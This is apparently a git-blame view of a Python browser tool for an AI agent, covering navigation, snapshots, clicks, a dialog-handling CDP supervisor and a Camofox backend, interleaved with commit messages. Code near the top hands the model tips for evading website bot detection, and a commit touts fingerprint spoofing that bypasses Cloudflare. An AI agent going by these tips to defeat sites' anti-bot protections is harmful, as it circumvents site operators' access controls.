" cloudflare " , " ddos protection " , " checking your browser " ,
" just a moment " , " attention required "
]
title_lower = title . lower ( )
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
if any ( pattern in title_lower for pattern in blocked_patterns ) :
response [ " bot_detection_warning " ] = (
f " Page title ' { title } ' suggests bot detection. The site may have blocked this request. "
" Options: 1) Try adding delays between actions, 2) Access different pages first, "
" 3) Enable advanced stealth (BROWSERBASE_ADVANCED_STEALTH=true, requires Scale plan), "
" 4) Some sites have very aggressive bot detection that may be unavoidable. "
)
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
# Include feature info on first navigation so model knows what's active
if is_first_nav and " features " in session_info :
features = session_info [ " features " ]
active_features = [ k for k , v in features . items ( ) if v ]
if not features . get ( " proxies " ) :
response [ " stealth_warning " ] = (
" Running WITHOUT residential proxies. Bot detection may be more aggressive. "
" Consider upgrading Browserbase plan for proxy support. "
)
response [ " stealth_features " ] = active_features
refactor: remove browser_close tool — auto-cleanup handles it (#5792)
* refactor: remove browser_close tool — auto-cleanup handles it
The browser_close tool was called in only 9% of browser sessions (13/144
navigations across 66 sessions), always redundantly — cleanup_browser()
already runs via _cleanup_task_resources() at conversation end, and the
background inactivity reaper catches anything else.
Removing it saves one tool schema slot in every browser-enabled API call.
Also fixes a latent bug: cleanup_browser() now handles Camofox sessions
too (previously only Browserbase). Camofox sessions were never auto-cleaned
per-task because they live in a separate dict from _active_sessions.
Files changed (13):
- tools/browser_tool.py: remove function, schema, registry entry; add
camofox cleanup to cleanup_browser()
- toolsets.py, model_tools.py, prompt_builder.py, display.py,
acp_adapter/tools.py: remove browser_close from all tool lists
- tests/: remove browser_close test, update toolset assertion
- docs/skills: remove all browser_close references
* fix: repeat browser_scroll 5x per call for meaningful page movement
Most backends scroll ~100px per call — barely visible on a typical
viewport. Repeating 5x gives ~500px (~half a viewport), making each
scroll tool call actually useful.
Backend-agnostic approach: works across all 7+ browser backends without
needing to configure each one's scroll amount individually. Breaks
early on error for the agent-browser path.
* feat: auto-return compact snapshot from browser_navigate
Every browser session starts with navigate → snapshot. Now navigate
returns the compact accessibility tree snapshot inline, saving one
tool call per browser task.
The snapshot captures the full page DOM (not viewport-limited), so
scroll position doesn't affect it. browser_snapshot remains available
for refreshing after interactions or getting full=true content.
Both Browserbase and Camofox paths auto-snapshot. If the snapshot
fails for any reason, navigation still succeeds — the snapshot is
a bonus, not a requirement.
Schema descriptions updated to guide models: navigate mentions it
returns a snapshot, snapshot mentions it's for refresh/full content.
* refactor: slim cronjob tool schema — consolidate model/provider, drop unused params
Session data (151 calls across 67 sessions) showed several schema
properties were never used by models. Consolidated and cleaned up:
Removed from schema (still work via backend/CLI):
- skill (singular): use skills array instead
- reason: pause-only, unnecessary
- include_disabled: now defaults to true
- base_url: extreme edge case, zero usage
- provider (standalone): merged into model object
Consolidated:
- model + provider → single 'model' object with {model, provider} fields.
If provider is omitted, the current main provider is pinned at creation
time so the job stays stable even if the user changes their default.
Kept:
- script: useful data collection feature
- skills array: standard interface for skill loading
Schema shrinks from 14 to 10 properties. All backend functionality
preserved — the Python function signature and handler lambda still
accept every parameter.
* fix: remove mixture_of_agents from core toolsets — opt-in only via hermes tools
MoA was in _HERMES_CORE_TOOLS and composite toolsets (hermes-cli,
hermes-messaging, safe), which meant it appeared in every session
for anyone with OPENROUTER_API_KEY set. The _DEFAULT_OFF_TOOLSETS
gate only works after running 'hermes tools' explicitly.
Now MoA only appears when a user explicitly enables it via
'hermes tools'. The moa toolset definition and check_fn remain
unchanged — it just needs to be opted into.
2026-04-07 03:28:44 -07:00
# Auto-take a compact snapshot so the model can act immediately
# without a separate browser_snapshot call.
try :
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
snap_result = _run_browser_command ( nav_session_key , " snapshot " , [ " -c " ] )
refactor: remove browser_close tool — auto-cleanup handles it (#5792)
* refactor: remove browser_close tool — auto-cleanup handles it
The browser_close tool was called in only 9% of browser sessions (13/144
navigations across 66 sessions), always redundantly — cleanup_browser()
already runs via _cleanup_task_resources() at conversation end, and the
background inactivity reaper catches anything else.
Removing it saves one tool schema slot in every browser-enabled API call.
Also fixes a latent bug: cleanup_browser() now handles Camofox sessions
too (previously only Browserbase). Camofox sessions were never auto-cleaned
per-task because they live in a separate dict from _active_sessions.
Files changed (13):
- tools/browser_tool.py: remove function, schema, registry entry; add
camofox cleanup to cleanup_browser()
- toolsets.py, model_tools.py, prompt_builder.py, display.py,
acp_adapter/tools.py: remove browser_close from all tool lists
- tests/: remove browser_close test, update toolset assertion
- docs/skills: remove all browser_close references
* fix: repeat browser_scroll 5x per call for meaningful page movement
Most backends scroll ~100px per call — barely visible on a typical
viewport. Repeating 5x gives ~500px (~half a viewport), making each
scroll tool call actually useful.
Backend-agnostic approach: works across all 7+ browser backends without
needing to configure each one's scroll amount individually. Breaks
early on error for the agent-browser path.
* feat: auto-return compact snapshot from browser_navigate
Every browser session starts with navigate → snapshot. Now navigate
returns the compact accessibility tree snapshot inline, saving one
tool call per browser task.
The snapshot captures the full page DOM (not viewport-limited), so
scroll position doesn't affect it. browser_snapshot remains available
for refreshing after interactions or getting full=true content.
Both Browserbase and Camofox paths auto-snapshot. If the snapshot
fails for any reason, navigation still succeeds — the snapshot is
a bonus, not a requirement.
Schema descriptions updated to guide models: navigate mentions it
returns a snapshot, snapshot mentions it's for refresh/full content.
* refactor: slim cronjob tool schema — consolidate model/provider, drop unused params
Session data (151 calls across 67 sessions) showed several schema
properties were never used by models. Consolidated and cleaned up:
Removed from schema (still work via backend/CLI):
- skill (singular): use skills array instead
- reason: pause-only, unnecessary
- include_disabled: now defaults to true
- base_url: extreme edge case, zero usage
- provider (standalone): merged into model object
Consolidated:
- model + provider → single 'model' object with {model, provider} fields.
If provider is omitted, the current main provider is pinned at creation
time so the job stays stable even if the user changes their default.
Kept:
- script: useful data collection feature
- skills array: standard interface for skill loading
Schema shrinks from 14 to 10 properties. All backend functionality
preserved — the Python function signature and handler lambda still
accept every parameter.
* fix: remove mixture_of_agents from core toolsets — opt-in only via hermes tools
MoA was in _HERMES_CORE_TOOLS and composite toolsets (hermes-cli,
hermes-messaging, safe), which meant it appeared in every session
for anyone with OPENROUTER_API_KEY set. The _DEFAULT_OFF_TOOLSETS
gate only works after running 'hermes tools' explicitly.
Now MoA only appears when a user explicitly enables it via
'hermes tools'. The moa toolset definition and check_fn remain
unchanged — it just needs to be opted into.
2026-04-07 03:28:44 -07:00
if snap_result . get ( " success " ) :
snap_data = snap_result . get ( " data " , { } )
snapshot_text = snap_data . get ( " snapshot " , " " )
refs = snap_data . get ( " refs " , { } )
if len ( snapshot_text ) > SNAPSHOT_SUMMARIZE_THRESHOLD :
snapshot_text = _truncate_snapshot ( snapshot_text )
response [ " snapshot " ] = snapshot_text
response [ " element_count " ] = len ( refs ) if refs else 0
except Exception as e :
logger . debug ( " Auto-snapshot after navigate failed: %s " , e )
2026-01-29 06:10:24 +00:00
return json . dumps ( response , ensure_ascii = False )
else :
return json . dumps ( {
" success " : False ,
" error " : result . get ( " error " , " Navigation failed " )
} , ensure_ascii = False )
def browser_snapshot (
full : bool = False ,
task_id : Optional [ str ] = None ,
user_task : Optional [ str ] = None
) - > str :
"""
Get a text - based snapshot of the current page ' s accessibility tree.
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Args :
full : If True , return complete snapshot . If False , return compact view .
task_id : Task identifier for session isolation
user_task : The user ' s current task (for task-aware extraction)
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Returns :
JSON string with page snapshot
"""
feat(browser): add Camofox local anti-detection browser backend (#4008)
Camofox-browser is a self-hosted Node.js server wrapping Camoufox
(Firefox fork with C++ fingerprint spoofing). When CAMOFOX_URL is set,
all 11 browser tools route through the Camofox REST API instead of
the agent-browser CLI.
Maps 1:1 to the existing browser tool interface:
- Navigate, snapshot, click, type, scroll, back, press, close
- Get images, vision (screenshot + LLM analysis)
- Console (returns empty with note — camofox limitation)
Setup: npm start in camofox-browser dir, or docker run -p 9377:9377
Then: CAMOFOX_URL=http://localhost:9377 in ~/.hermes/.env
Advantages over Browserbase (cloud):
- Free (no per-session API costs)
- Local (zero network latency for browser ops)
- Anti-detection at C++ level (bypasses Cloudflare/Google bot detection)
- Works offline, Docker-ready
Files:
- tools/browser_camofox.py: Full REST backend (~400 lines)
- tools/browser_tool.py: Routing at each tool function
- hermes_cli/config.py: CAMOFOX_URL env var entry
- tests/tools/test_browser_camofox.py: 20 tests
2026-03-30 13:18:42 -07:00
if _is_camofox_mode ( ) :
from tools . browser_camofox import camofox_snapshot
return camofox_snapshot ( full , task_id , user_task )
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
effective_task_id = _last_session_key ( task_id or " default " )
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
# Build command args based on full flag
args = [ ]
if not full :
args . extend ( [ " -c " ] ) # Compact mode
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
result = _run_browser_command ( effective_task_id , " snapshot " , args )
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
if result . get ( " success " ) :
data = result . get ( " data " , { } )
snapshot_text = data . get ( " snapshot " , " " )
refs = data . get ( " refs " , { } )
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
# Check if snapshot needs summarization
if len ( snapshot_text ) > SNAPSHOT_SUMMARIZE_THRESHOLD and user_task :
2026-02-22 02:16:11 -08:00
snapshot_text = _extract_relevant_content ( snapshot_text , user_task )
2026-01-29 06:10:24 +00:00
elif len ( snapshot_text ) > SNAPSHOT_SUMMARIZE_THRESHOLD :
snapshot_text = _truncate_snapshot ( snapshot_text )
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
response = {
" success " : True ,
" snapshot " : snapshot_text ,
" element_count " : len ( refs ) if refs else 0
}
feat(browser): CDP supervisor — dialog detection + response + cross-origin iframe eval (#14540)
* docs: browser CDP supervisor design (for upcoming PR)
Design doc ahead of implementation — dialog + iframe detection/interaction
via a persistent CDP supervisor. Covers backend capability matrix (verified
live 2026-04-23), architecture, lifecycle, policy, agent surface, PR split,
non-goals, and test plan.
Supersedes #12550.
No code changes in this commit.
* feat(browser): add persistent CDP supervisor for dialog + frame detection
Single persistent CDP WebSocket per Hermes task_id that subscribes to
Page/Runtime/Target events and maintains thread-safe state for pending
dialogs, frame tree, and console errors.
Supervisor lives in its own daemon thread running an asyncio loop;
external callers use sync API (snapshot(), respond_to_dialog()) that
bridges onto the loop.
Auto-attaches to OOPIF child targets via Target.setAutoAttach{flatten:true}
and enables Page+Runtime on each so iframe-origin dialogs surface through
the same supervisor.
Dialog policies: must_respond (default, 300s safety timeout),
auto_dismiss, auto_accept.
Frame tree capped at 30 entries + OOPIF depth 2 to keep snapshot
payloads bounded on ad-heavy pages.
E2E verified against real Chrome via smoke test — detects + responds
to main-frame alerts, iframe-contentWindow alerts, preserves frame
tree, graceful no-dialog error path, clean shutdown.
No agent-facing tool wiring in this commit (comes next).
* feat(browser): add browser_dialog tool wired to CDP supervisor
Agent-facing response-only tool. Schema:
action: 'accept' | 'dismiss' (required)
prompt_text: response for prompt() dialogs (optional)
dialog_id: disambiguate when multiple dialogs queued (optional)
Handler:
SUPERVISOR_REGISTRY.get(task_id).respond_to_dialog(...)
check_fn shares _browser_cdp_check with browser_cdp so both surface and
hide together. When no supervisor is attached (Camofox, default
Playwright, or no browser session started yet), tool is hidden; if
somehow invoked it returns a clear error pointing the agent to
browser_navigate / /browser connect.
Registered in _HERMES_CORE_TOOLS and the browser / hermes-acp /
hermes-api-server toolsets alongside browser_cdp.
* feat(browser): wire CDP supervisor into session lifecycle + browser_snapshot
Supervisor lifecycle:
* _get_session_info lazy-starts the supervisor after a session row is
materialized — covers every backend code path (Browserbase, cdp_url
override, /browser connect, future providers) with one hook.
* cleanup_browser(task_id) stops the supervisor for that task first
(before the backend tears down CDP).
* cleanup_all_browsers() calls SUPERVISOR_REGISTRY.stop_all().
* /browser connect eagerly starts the supervisor for task 'default'
so the first snapshot already shows pending_dialogs.
* /browser disconnect stops the supervisor.
CDP URL resolution for the supervisor:
1. BROWSER_CDP_URL / browser.cdp_url override.
2. Fallback: session_info['cdp_url'] from cloud providers (Browserbase).
browser_snapshot merges supervisor state (pending_dialogs + frame_tree)
into its JSON output when a supervisor is active — the agent reads
pending_dialogs from the snapshot it already requests, then calls
browser_dialog to respond. No extra tool surface.
Config defaults:
* browser.dialog_policy: 'must_respond' (new)
* browser.dialog_timeout_s: 300 (new)
No version bump — new keys deep-merge into existing browser section.
Deadlock fix in supervisor event dispatch:
* _on_dialog_opening and _on_target_attached used to await CDP calls
while the reader was still processing an event — but only the reader
can set the response Future, so the call timed out.
* Both now fire asyncio.create_task(...) so the reader stays pumping.
* auto_dismiss/auto_accept now actually close the dialog immediately.
Tests (tests/tools/test_browser_supervisor.py, 11 tests, real Chrome):
* supervisor start/snapshot
* main-frame alert detection + dismiss
* iframe.contentWindow alert
* prompt() with prompt_text reply
* respond with no pending dialog -> clean error
* auto_dismiss clears on event
* registry idempotency
* registry stop -> snapshot reports inactive
* browser_dialog tool no-supervisor error
* browser_dialog invalid action
* browser_dialog end-to-end via tool handler
xdist-safe: chrome_cdp fixture uses a per-worker port.
Skipped when google-chrome/chromium isn't installed.
* docs(browser): document browser_dialog tool + CDP supervisor
- user-guide/features/browser.md: new browser_dialog section with
workflow, availability gate, and dialog_policy table
- reference/tools-reference.md: row for browser_dialog, tool count
bumped 53 -> 54, browser tools count 11 -> 12
- reference/toolsets-reference.md: browser_dialog added to browser
toolset row with note on pending_dialogs / frame_tree snapshot fields
Full design doc lives at
developer-guide/browser-supervisor.md (committed earlier).
* fix(browser): reconnect loop + recent_dialogs for Browserbase visibility
Found via Browserbase E2E test that revealed two production-critical issues:
1. **Supervisor WebSocket drops when other clients disconnect.** Browserbase's
CDP proxy tears down our long-lived WebSocket whenever a short-lived
client (e.g. agent-browser CLI's per-command CDP connection) disconnects.
Fixed with a reconnecting _run loop that re-attaches with exponential
backoff on drops. _page_session_id and _child_sessions are reset on each
reconnect; pending_dialogs and frames are preserved across reconnects.
2. **Browserbase auto-dismisses dialogs server-side within ~10ms.** Their
Playwright-based CDP proxy dismisses alert/confirm/prompt before our
Page.handleJavaScriptDialog call can respond. So pending_dialogs is
empty by the time the agent reads a snapshot on Browserbase.
Added a recent_dialogs ring buffer (capacity 20) that retains a
DialogRecord for every dialog that opened, with a closed_by tag:
* 'agent' — agent called browser_dialog
* 'auto_policy' — local auto_dismiss/auto_accept fired
* 'watchdog' — must_respond timeout auto-dismissed (300s default)
* 'remote' — browser/backend closed it on us (Browserbase)
Agents on Browserbase now see the dialog history with closed_by='remote'
so they at least know a dialog fired, even though they couldn't respond.
3. **Page.javascriptDialogClosed matching bug.** The event doesn't include a
'message' field (CDP spec has only 'result' and 'userInput') but our
_on_dialog_closed was matching on message. Fixed to match by session_id
+ oldest-first, with a safety assumption that only one dialog is in
flight per session (the JS thread is blocked while a dialog is up).
Docs + tests updated:
* browser.md: new availability matrix showing the three backends and
which mode (pending / recent / response) each supports
* developer-guide/browser-supervisor.md: three-field snapshot schema
with closed_by semantics
* test_browser_supervisor.py: +test_recent_dialogs_ring_buffer (12/12
passing against real Chrome)
E2E verified both backends:
* Local Chrome via /browser connect: detect + respond full workflow
(smoke_supervisor.py all 7 scenarios pass)
* Browserbase: detect via recent_dialogs with closed_by='remote'
(smoke_supervisor_browserbase_v2.py passes)
Camofox remains out of scope (REST-only, no CDP) — tracked for
upstream PR 3.
* feat(browser): XHR bridge for dialog response on Browserbase (FIXED)
Browserbase's CDP proxy auto-dismisses native JS dialogs within ~10ms, so
Page.handleJavaScriptDialog calls lose the race. Solution: bypass native
dialogs entirely.
The supervisor now injects Page.addScriptToEvaluateOnNewDocument with a
JavaScript override for window.alert/confirm/prompt. Those overrides
perform a synchronous XMLHttpRequest to a magic host
('hermes-dialog-bridge.invalid'). We intercept those XHRs via Fetch.enable
with a requestStage=Request pattern.
Flow when a page calls alert('hi'):
1. window.alert override intercepts, builds XHR GET to
http://hermes-dialog-bridge.invalid/?kind=alert&message=hi
2. Sync XHR blocks the page's JS thread (mirrors real dialog semantics)
3. Fetch.requestPaused fires on our WebSocket; supervisor surfaces
it as a pending dialog with bridge_request_id set
4. Agent reads pending_dialogs from browser_snapshot, calls browser_dialog
5. Supervisor calls Fetch.fulfillRequest with JSON body:
{accept: true|false, prompt_text: '...', dialog_id: 'd-N'}
6. The injected script parses the body, returns the appropriate value
from the override (undefined for alert, bool for confirm, string|null
for prompt)
This works identically on Browserbase AND local Chrome — no native dialog
ever fires, so Browserbase's auto-dismiss has nothing to race. Dialog
policies (must_respond / auto_dismiss / auto_accept) all still work.
Bridge is installed on every attached session (main page + OOPIF child
sessions) so iframe dialogs are captured too.
Native-dialog path kept as a fallback for backends that don't auto-dismiss
(so a page that somehow bypasses our override — e.g. iframes that load
after Fetch.enable but before the init-script runs — still gets observed
via Page.javascriptDialogOpening).
E2E VERIFIED:
* Local Chrome: 13/13 pytest tests green (12 original + new
test_bridge_captures_prompt_and_returns_reply_text that asserts
window.__ret === 'AGENT-SUPPLIED-REPLY' after agent responds)
* Browserbase: smoke_bb_bridge_v2.py runs 4/4 PASS:
- alert('BB-ALERT-MSG') dismiss → page.alert_ret = undefined ✓
- prompt('BB-PROMPT-MSG', 'default-xyz') accept with 'AGENT-REPLY'
→ page.prompt_ret === 'AGENT-REPLY' ✓
- confirm('BB-CONFIRM-MSG') accept → page.confirm_ret === true ✓
- confirm('BB-CONFIRM-MSG') dismiss → page.confirm_ret === false ✓
Docs updated in browser.md and developer-guide/browser-supervisor.md —
availability matrix now shows Browserbase at full parity with local
Chrome for both detection and response.
* feat(browser): cross-origin iframe interaction via browser_cdp(frame_id=...)
Adds iframe interaction to the CDP supervisor PR (was queued as PR 2).
Design: browser_cdp gets an optional frame_id parameter. When set, the
tool looks up the frame in the supervisor's frame_tree, grabs its child
cdp_session_id (OOPIF session), and dispatches the CDP call through the
supervisor's already-connected WebSocket via run_coroutine_threadsafe.
Why not stateless: on Browserbase, each fresh browser_cdp WebSocket
must re-negotiate against a signed connectUrl. The session info carries
a specific URL that can expire while the supervisor's long-lived
connection stays valid. Routing via the supervisor sidesteps this.
Agent workflow:
1. browser_snapshot → frame_tree.children[] shows OOPIFs with is_oopif=true
2. browser_cdp(method='Runtime.evaluate', frame_id=<OOPIF frame_id>,
params={'expression': 'document.title', 'returnByValue': True})
3. Supervisor dispatches the call on the OOPIF's child session
Supervisor state fixes needed along the way:
* _on_frame_detached now skips reason='swap' (frame migrating processes)
* _on_frame_detached also skips when the frame is an OOPIF with a live
child session — Browserbase fires spurious remove events when a
same-origin iframe gets promoted to OOPIF
* _on_target_detached clears cdp_session_id but KEEPS the frame record
so the agent still sees the OOPIF in frame_tree during transient
session flaps
E2E VERIFIED on Browserbase (smoke_bb_iframe_agent_path.py):
browser_cdp(method='Runtime.evaluate',
params={'expression': 'document.title', 'returnByValue': True},
frame_id=<OOPIF>)
→ {'success': True, 'result': {'value': 'Example Domain'}}
The iframe is <iframe src='https://example.com/'> inside a top-level
data: URL page on a real Browserbase session. The agent Runtime.evaluates
INSIDE the cross-origin iframe and gets example.com's title back.
Tests (tests/tools/test_browser_supervisor.py — 16 pass total):
* test_browser_cdp_frame_id_routes_via_supervisor — injects fake OOPIF,
verifies routing via supervisor, Runtime.evaluate returns 1+1=2
* test_browser_cdp_frame_id_missing_supervisor — clean error when no
supervisor attached
* test_browser_cdp_frame_id_not_in_frame_tree — clean error on bad
frame_id
Docs (browser.md and developer-guide/browser-supervisor.md) updated with
the iframe workflow, availability matrix now shows OOPIF eval as shipped
for local Chrome + Browserbase.
* test(browser): real-OOPIF E2E verified manually + chrome_cdp uses --site-per-process
When asked 'did you test the iframe stuff' I had only done a mocked
pytest (fake injected OOPIF) plus a Browserbase E2E. Closed the
local-Chrome real-OOPIF gap by writing /tmp/dialog-iframe-test/
smoke_local_oopif.py:
* 2 http servers on different hostnames (localhost:18905 + 127.0.0.1:18906)
* Chrome with --site-per-process so the cross-origin iframe becomes a
real OOPIF in its own process
* Navigate, find OOPIF in supervisor.frame_tree, call
browser_cdp(method='Runtime.evaluate', frame_id=<OOPIF>) which routes
through the supervisor's child session
* Asserts iframe document.title === 'INNER-FRAME-XYZ' (from the
inner page, retrieved via OOPIF eval)
PASSED on 2026-04-23.
Tried to embed this as a pytest but hit an asyncio version quirk between
venv (3.11) and the system python (3.13) — Page.navigate hangs in the
pytest harness but works in standalone. Left a self-documenting skip
test that points to the smoke script + describes the verification.
chrome_cdp fixture now passes --site-per-process so future iframe tests
can rely on OOPIF behavior.
Result: 16 pass + 1 documented-skip = 17 tests in
tests/tools/test_browser_supervisor.py.
* docs(browser): add dialog_policy + dialog_timeout_s to configuration.md, fix tool count
Pre-merge docs audit revealed two gaps:
1. user-guide/configuration.md browser config example was missing the
two new dialog_* knobs. Added with a short table explaining
must_respond / auto_dismiss / auto_accept semantics and a link to
the feature page for the full workflow.
2. reference/tools-reference.md header said '54 built-in tools' — real
count on main is 54, this branch adds browser_dialog so it's 55.
Fixed the header. (browser count was already correctly bumped
11 -> 12 in the earlier docs commit.)
No code changes.
2026-04-23 22:23:37 -07:00
# Merge supervisor state (pending dialogs + frame tree) when a CDP
# supervisor is attached to this task. No-op otherwise. See
# website/docs/developer-guide/browser-supervisor.md.
try :
from tools . browser_supervisor import SUPERVISOR_REGISTRY # type: ignore[import-not-found]
_supervisor = SUPERVISOR_REGISTRY . get ( effective_task_id )
if _supervisor is not None :
_sv_snap = _supervisor . snapshot ( )
if _sv_snap . active :
response . update ( _sv_snap . to_dict ( ) )
except Exception as _sv_exc :
logger . debug ( " supervisor snapshot merge failed: %s " , _sv_exc )
2026-01-29 06:10:24 +00:00
return json . dumps ( response , ensure_ascii = False )
else :
return json . dumps ( {
" success " : False ,
" error " : result . get ( " error " , " Failed to get snapshot " )
} , ensure_ascii = False )
def browser_click ( ref : str , task_id : Optional [ str ] = None ) - > str :
"""
Click on an element .
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Args :
ref : Element reference ( e . g . , " @e5 " )
task_id : Task identifier for session isolation
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Returns :
JSON string with click result
"""
feat(browser): add Camofox local anti-detection browser backend (#4008)
Camofox-browser is a self-hosted Node.js server wrapping Camoufox
(Firefox fork with C++ fingerprint spoofing). When CAMOFOX_URL is set,
all 11 browser tools route through the Camofox REST API instead of
the agent-browser CLI.
Maps 1:1 to the existing browser tool interface:
- Navigate, snapshot, click, type, scroll, back, press, close
- Get images, vision (screenshot + LLM analysis)
- Console (returns empty with note — camofox limitation)
Setup: npm start in camofox-browser dir, or docker run -p 9377:9377
Then: CAMOFOX_URL=http://localhost:9377 in ~/.hermes/.env
Advantages over Browserbase (cloud):
- Free (no per-session API costs)
- Local (zero network latency for browser ops)
- Anti-detection at C++ level (bypasses Cloudflare/Google bot detection)
- Works offline, Docker-ready
Files:
- tools/browser_camofox.py: Full REST backend (~400 lines)
- tools/browser_tool.py: Routing at each tool function
- hermes_cli/config.py: CAMOFOX_URL env var entry
- tests/tools/test_browser_camofox.py: 20 tests
2026-03-30 13:18:42 -07:00
if _is_camofox_mode ( ) :
from tools . browser_camofox import camofox_click
return camofox_click ( ref , task_id )
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
effective_task_id = _last_session_key ( task_id or " default " )
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
# Ensure ref starts with @
if not ref . startswith ( " @ " ) :
ref = f " @ { ref } "
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
result = _run_browser_command ( effective_task_id , " click " , [ ref ] )
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
if result . get ( " success " ) :
return json . dumps ( {
" success " : True ,
" clicked " : ref
} , ensure_ascii = False )
else :
return json . dumps ( {
" success " : False ,
" error " : result . get ( " error " , f " Failed to click { ref } " )
} , ensure_ascii = False )
def browser_type ( ref : str , text : str , task_id : Optional [ str ] = None ) - > str :
"""
Type text into an input field .
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Args :
ref : Element reference ( e . g . , " @e3 " )
text : Text to type
task_id : Task identifier for session isolation
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Returns :
JSON string with type result
"""
feat(browser): add Camofox local anti-detection browser backend (#4008)
Camofox-browser is a self-hosted Node.js server wrapping Camoufox
(Firefox fork with C++ fingerprint spoofing). When CAMOFOX_URL is set,
all 11 browser tools route through the Camofox REST API instead of
the agent-browser CLI.
Maps 1:1 to the existing browser tool interface:
- Navigate, snapshot, click, type, scroll, back, press, close
- Get images, vision (screenshot + LLM analysis)
- Console (returns empty with note — camofox limitation)
Setup: npm start in camofox-browser dir, or docker run -p 9377:9377
Then: CAMOFOX_URL=http://localhost:9377 in ~/.hermes/.env
Advantages over Browserbase (cloud):
- Free (no per-session API costs)
- Local (zero network latency for browser ops)
- Anti-detection at C++ level (bypasses Cloudflare/Google bot detection)
- Works offline, Docker-ready
Files:
- tools/browser_camofox.py: Full REST backend (~400 lines)
- tools/browser_tool.py: Routing at each tool function
- hermes_cli/config.py: CAMOFOX_URL env var entry
- tests/tools/test_browser_camofox.py: 20 tests
2026-03-30 13:18:42 -07:00
if _is_camofox_mode ( ) :
from tools . browser_camofox import camofox_type
return camofox_type ( ref , text , task_id )
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
